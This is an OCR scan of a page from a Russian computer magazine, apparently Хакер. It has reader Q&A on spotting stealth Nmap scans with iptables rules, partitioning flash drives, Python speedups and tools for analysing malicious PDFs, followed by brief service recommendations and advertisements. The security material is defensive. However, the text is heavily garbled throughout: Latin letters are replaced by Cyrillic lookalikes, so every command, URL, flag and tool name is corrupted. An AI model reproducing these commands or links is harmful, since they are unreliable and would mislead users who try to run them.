запускаем там скрипт «гибу депегаІе.гЬ». 

О: Как распознать скрытое сканирование Мгпар? 

А: Метод скрытого сканирования Ытар 
используется в том случае, когда нужно скрыть 
сам фактсканирования. Методика использует 
нестандартные комбинации флагов ТСР-па- 
кетов, поэтому системный журнал редко такое 
сканирование фиксирует. Если по каким-то 
(вероятно, параноидальным) причинамты 
все-таки хочешь отлавливать подобные 
прецеденты, это легко делается с помощью 
ЕгеѵѵаІГа. В инете можно найти следующие 
варианты: 

ірРаЫез -А ШРОТ -р Сер --Рср-РІадз 

АСК , РШ РШ -з ЬОС --Іод-ргеРіх 

" ЗРеаІРЪ. зсап" 

ірРаЫез -А ШРОТ -р Сер --Рср-РІадз 

АСК , РШ РШ -з БКОР 

Параметры «--^ср-біадэ АСК, РІ N РІ N » опи- 
сывают комбинацию ТС Р-фл а го в. Первый 
список состояний (АС К, РІ N ) указывает 
флаги, которые надо проверить, второй ( РІ N ) 
проверяет, какие из нихустановлены. Таким 
образом, условие соответствуеттем пакетам, 
в которых есть РІ N -флаг, но нет АСК. При нор- 
мальном ТС Р-соеди нении эта комбинация 



невозможна, что свидетельствует о скрытом 
сканировании. 

О: Можно ли разбить флешку на несколько 
дисков? 

А:0сновная проблема втом, что ѴѴіп б оѵѵз счи- 
тает: раз это флешка, то у нее может быть толь- 
ко один раздел. Даже если поделить каким-ни- 
будь независимым от винды средством вроде 
СРагіеб (ЫѵеСО на базе Ыпих'аі.то в системе 
будет определяться только один из разделов. 
Одно из решений проблемы — заставить сис- 
тему определять пендрайв не какфлешку, а как 
сменный жесткий диск. Для этого контроллер 
флешки нужно перевести в режим НОВ, в чем 
в большинстве случаев может помочьутилита 
ВообП Увы, под Ѵіз1:а/ѴѴіпбоѵѵ57 она поумолча- 
нию не работает, поэтому запускать ее придет- 
ся в режиме совместимости. Болышихзнаний 
и умений она нетребует: достаточно выбрать 
из списка букву нужной флешки и нажать на 
кнопку «Ріір ПетоѵаЫе В И; » . После этого тулза 
попросит вытащить флешку и вставить ее 
обратно. Вуаля, если открытьлюбым менед- 
жером разделов (скажем, через «Управление 
дисками» в системе), то мы сможем поделить 
накопитель на несколько разделов. Правда, 
стоит заметить, что с некоторыми флешками 
такой фокус все-таки не проходит. 

О: Как бы ускорить выполнения кода на РуІНоп? 
Есть скрипт, которые обрабатывает данные. 
Написал его быстро, а работает он медленно. 
Есть ли способ увеличить скорость? 

А: Есть. Проект Рзусо ( рзѵсо.зоигсеіогое.пеі ) 
показывает, что выполнять код на РуІІзоп 




можно на скорости, сравнимой с полностью 
компилируемыми языками. В результате 
использования специального модуля на І386 
процессорах можно добавиться 2-1 00-крат- 
ного увеличения производительности, в 
зависимости от кода. 

О: Составляю подборку для изучения вредонос- 
ных РОР-файлов. Подскажи инструменты. 

А: РОЕЮ (Ьіод.сіісііегзіюѵепз.сот/ргодгатз/ 
рсІМооІз) — определяет, если РОЕ-документ 
содержит строку, ассоциированную со скрип- 
тами или действиями; 

РОЕ-рагзег— выявляет ключевые элементы 
РОЕ без рендеринга документа (и соответс- 
твенно возможности заражения); 

Огідаті ѴѴаІкег ( зесигіІѵ-ІаЬз.огд/о : ) — 

изучает структуру РОЕ-файла; 

Огідаті рсЛзсап — определяет подозритель- 
ные строки; 

Огідаті ехігас^з и бзітраск-п’з рбЕру — из- 
влекает баѵаВсгірБкод из РОЕ-файлов; 
Витаіха РйЕ ( Ыоо.коѵѵаІсгѵк.іпІю/зоЕѵѵаге/ 
зитаігарбЯ и МиРРЕ (ссхѵіі.пеі/тирбЯ — аль- 
тернативные просмотрщики, в которых сплоит, 
возможно, не заработает; 

МаБіІіа кл/ѵѵѵѵ.таІУІЦа.огд ) — извлекает и 
декомпрессирует потоки из РОЕ, а также может 
быть полезен для деобфускации баѵаВсгір!:- 

кода; 

бзипраск-п ^зипраск.ЫодзроЕ сот/2009/06/ 
Ізипраск-п-ирбаІез-І'ог-рбІ'-бесобіпа.ЫтІ ) 

— извлекает и декодирует баѵаВсгірІ: из 
РСАР-дампов-снифера, а также декодирует 
РОЕ-файлы. 

О: Есть л и возможность, обращаться к сервисам 
Ѳоодіе из командной строки? Хочу автоматизи- 
ровать скачивание фотографий с Рісаза ѴѴеЬ. 

А: Да, совсем недавно появился пакет доодіесі 
( собе.доодіе.сот/р/дооаіесі ). позволяющий 
обращаться ксервисам гугла из командной 
строки. Примеры использования: 

Сервис блогов Віоддег: 

$ доодіе Ыоддег розР --РіРІе " Роо" 

" согшпапб Ііпе розРіпд" 

Календарь Саіепбаг: 

$ доодіе саіепбаг асМ "ЬипсЬ ОТРЬ. 

Лш аР пооп Ротогготл" 

Контакты СопРасРз: 

$ доодіе сопРасРз ІізР паше,еілаі1 > 
сопРасРз . сзѵ 
Соодіе Босз : 

$ доодіе босз ебіР --РіРІе " ЗРюрріпд 
ІізР " 

Хранилища фотографий Рісаза: 

$ доодіе рісаза сгеаРе --РіРІе "СаР 
РРюРоз" -/ріюРоз/саРз/* . зрд 
Видеохостинг УоиРиЬе: 

$ доодіе уоиРиЬе розР --саРедогу 
ЕбисаРіоп кі11ег_гоЬоРз . аѵі 

Все эти консольные утилиты работают через 
боодіе Оаіа АРІ и доступны как для ѴѴі псіоѵѵз, 
так и Бі п их. ИИ 





► 142 



ХАКЕР 10/141/10 





ТУЛКИТ ДЛЯ СОЦИАЛЬНОМ ИНЖЕНЕРИИ 
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Нас часто спрашивают: «Как получить деньги за работу от иностран- 
ного заказчика?». У западных фрилансерских бирж (СеіАРгееІапсег, 
РепіАСосІег, оОезк, еІ_апсе) долгое время были свои порядки вывода 
денег. К счастью, теперь все они стали поддерживать метод выплате 
помощью карточекот компании Раѵопеег [ ѵѵѵѵѵѵ.раѵопеег.сопп ). которые 
отлично работаютв России. Карта стоит небольших денег и втечение 
нескольких недель приходит в Россию по обычной почте. Для выво- 
да средств тебе остается только указать параметры своего аккаунта в 
Рауопеег, после чего быстро снимать перечисленные деньги через любой 
банкомат. С помощью Рауопеег можно даже принимать платежи по 
РауРаІ, которая является излюбленной платежной системой на западе. 



І « № ИГ I. 7 Зі5 ЙУ ’іѵс !>■№' (а.й№| »! 



_К ^ 

Для поиска .іоггепі- 

торкЕытг 



ѵѵѵѵѵѵ.іоггепіг.сот 



Когда-то давно, чтобы найти .Іюггепіщля скачивания чего-либо достаточ- 
но было набрать в Ооодіе «название файла .Ьггепі». Теперьже вместо 
вменяемыхссылокнатрекеры в результатах получаешь кучу спама от 
фейковых порталов вроде юггепібоѵѵпіоабз.пеі: . Заниматься фильтра- 
цией вручную — задача неблагодарная, поэтому я очень быстро стал 
использовать специальные ІюггепІ-поисковики. Для западныхтрекеров 
одними из самыхлѵчшихсервисов являются Іюггепіг.сот и ізобипі.сот . 
Вводишь название файла и получаешь ссылки на .Ьггепі: с информацией 
о сидерах и личерах. Увы, русские трекеры они обходят стороной, но зато 
для наших ресурсов есть другие поисковики: ІоггбЦа.ги . 2і:оггепІ5.огд . 
кіпоЬага.Іѵ . 
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Для приема платежей 
от западных заказ- 
чиков 



РАѴОЫЕЕК 

ѵѵѵѵѵѵ.раѵопеег.сопп 




С 



ЭДипгіі 



Щч 

Для проверки надеж- 
ности пароля 



Ф V 



Е 



Н0ѴѴ5ЕСІЖЕІ5МѴ 

РА55ѴѴ0В0? 

ѵѵѵѵѵѵ.ЬоѵѵБесигеізту 

раззѵѵогсі.пеі 

Скорость подбора с помощью пароля можно описать нехитрой мате- 
матической формулой: количество возможных символов, возведенное 
в степеньдлины пароля, поделенное на количество перебираемых 
паролей в секунду. В результате получается примерное время в 
секундах. Впрочем, чтобы доказать человеку, что на деле означает 
простой пароль, не нужно грузить его математикой. Достаточно зайти 
на сайт ЬоѵѵзесигеізппѵраззѵѵогсІ.пеК ввести «д1Ь|кт» (слово «пароль» в 
латинской раскладке) и показать, что такой пасс сбрутится на обычном 
РС за 30 секунд. Вообще потестить пароли довольно интересно: сразу 
становится видно, что длина пароля намного важнее его сложности. 
Для взлома «#Р00ѣ$НЗИ» уйдет 1 95 лет, а на, казалось бы, простой 
«абсбеіді 234567» — 5722 года. 



<1 



Для создания скринкастов 
и интерактивных инструкций 



ІОКАй 

ѵѵѵѵѵѵ.іогасі.сот 



Скринкасты — удобнейший инструмент, если нужно что-то продемонс- 
трировать. Но если на скринкаст наложить красивые комментарии в виде 
всплывающих плашек, сделать сноски, выделять важные элементы или 
окна, затемняя весь остальной экран, отмечать клики мыши, то получа- 
ется и вовсе идеальная интерактивная инструкция. Создать не просто 
скринкаст, а именно интерактивные мануалы с подробными комментария 
ми и сопутствующими эффектами позволяет веб-сервис ІОРАО. Не надо 
ничего устанавливать на компьютер, для начала работы необходимо лишь 
зарегистрироваться на сервисе и нажать кнопку «Саріиге». 
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Наш РС никогда не висит! 




МАХІМ 

МУЖСКОЙ ЖУРНАЛ С ИМЕНЕМ 



А 



Альфа-Банк 



(дате)іаіиі 



( 495 ) 78 - 888-78 (для Москвы), 8 - 800 - 2000-000 (бесплатно для регионов России) ОАО «АЛЬФА-БАНК». Генеральная лицензия Банка России на осуществление банковских операций от 29.01.1998 №1326 . НА ПРАВАХ РЕКЛАМЫ. 
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сеть оптово-розничных магазинов 
компьютерной и цифровой техники 



Подробности на сайтах: 
Москва: ѵѵѵуѵѵ.і-вНоск.ги 
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